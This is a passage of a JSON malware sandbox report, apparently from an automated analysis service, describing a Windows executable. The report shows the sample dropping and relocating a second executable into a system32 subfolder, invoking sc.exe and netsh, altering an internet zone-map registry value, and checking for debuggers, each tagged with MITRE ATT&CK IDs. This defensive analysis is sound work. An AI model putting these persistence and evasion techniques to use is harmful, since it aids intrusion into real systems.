"informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe.Local\\\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\89556F10251B58F31A9E3CBF5B298A1E325E4ADA7344DA89BEA648D00F695014.EXE.LOCAL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\dqczsfku.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"CONSENTPROMPTBEHAVIORADMIN\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"PROMPTONSECUREDESKTOP\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"89556F10251B58F31A9E3CBF5B298A1E325E4ADA7344DA89BEA648D00F695014\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"dqczsfku.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" reads file \"c:\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SHELLCOMPATIBILITY\\APPLICATIONS\\89556F10251B58F31A9E3CBF5B298A1E325E4ADA7344DA89BEA648D00F695014.EXE\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"dqczsfku.exe.67EE49BD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"dqczsfku.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\dqczsfku.exe]- [targetUID: 00000000-00004680]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F830000\n \"dqczsfku.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F830000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F830000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00005184-00000105-5690935", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dqczsfku.exe\" to \"%WINDIR%\\system32\\vrzjqkmq\\dqczsfku.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-360740 [PID: 5184]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-722530 [PID: 5184]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-1711233 [PID: 5184]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-1921363 [PID: 5184]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-2421033 [PID: 5184]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-2611644 [PID: 5184]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005184-00000105-3207554 [PID: 5184]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-106961 [PID: 2988]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" queries volume information of \"C:\\\" at 00000000-00004680-0000010C-1377643\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" queries volume information of \"C:\\\" at 00000000-00004680-0000010C-1379031\n \"dqczsfku.exe\" queries volume information of \"C:\\\" at 00000000-00005212-0000010C-2059040\n \"dqczsfku.exe\" queries volume information of \"C:\\\" at 00000000-00005212-0000010C-2060538\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-76181\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-650724\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-1295611\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-1297013", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e7100fce2120080f43975000071000000000089f43975ae20fdbb0200000070e312006ce3120064e2120068e2120018e4120095e11077fba21100c0e21200c83a437534e31200d58c3b7570e3120004e3120042a43975a802437544e31200d2f43975080000006ef5397544f539751621fdbb0200000070aa836f0000130026bb836f18e31200020000000000130070aa836f48e3120042a43975a80243758ce3120010a9836f08000000e6a8836f1a84ecbb0200000070aa836f0000130026bb836fac0e7100780e710058e3120080508f6f18e41200f9f2876f7ecf7dd4 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000494191a40300000044e56d01bb6bcbbad81200008ce56d01c0e46d01590000000300000048e46d0150e46d0118e66d01d0bb3c6b8f1f98d0feffffff98e56d01bfe53b6b494191a498e56d01cce53b6b060000000000086a01000000dfe53b6b3333ff040600000002000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56d01000000008e00000044e66d01feffffffcce56d01cf001577d6001577275b68768e0000004700000044e66d0100000000a0e56d010000000008e66d01 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036009de8cbba44de6d016d8234752c1f2f0004010000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000660033003100610039006500330063006200660035006200320039003800610031006500330032003500650034006100640061003700330034003400640061003800390062006500610036003400380064003000300066003600390035003000310034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b14771b766876d8eb8e76ac0127000000270000000000000000000400e800c9000000000000000000000000000000000000000500e300c900000000000000000000000870270000000000200000000000000000000000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000270048003200000000003e00003e340000c070023200e829320090973100f0010000000027000400000048003200acee6d010464147738012700e0631477475068760000000000002700500032006dd1ba7663c18dba6caea6750000000000000000f4010000e8293200d82f27000100000000002700500127000c00000050003200d82f27000200000218000000c0400080820000000000000000000000030000004cee6d01820000007f07000000000000c040008002000000c075c276e829320000000000c075c27668ee6d01e830270000000000d82f2700c0ee6d01ff2b1477 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000371cb3310300000044e56d01bb6bcbba301300008ce56d01c0e46d015b0000000300000048e46d0150e46d0118e66d01d0bb3c6b8f1f98d0feffffff98e56d01bfe53b6b371cb33198e56d01cce53b6b820500000000086a01000000dfe53b6b3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700e029320000000000ac0200ae340000c0082c3200e8372e00488d2e00601100000000270000000100e0293200acee6d010464147738012700e0631477475068760000000000002700e82932006dd1ba7663c18dba6caea6750000000000000000fc000000e8372e00d82f27000100000000002700500127000c000000e8293200d82f270002000002180000000c030807f00200000000000000000000030000004cee6d01f00200008c020000000000000022002270020000c075c276e81f330000000000c075c27668ee6d014c30270000000000d82f2700c0ee6d01ff2b1477 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000acd5984f0300000044e56d01bb6bcbba7c0800008ce56d01c0e46d015b0000000300000048e46d0150e46d0118e66d01d0bb3c6b8f1f98d0feffffff98e56d01bfe53b6bacd5984f98e56d01cce53b6b820500000000086a01000000dfe53b6b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": 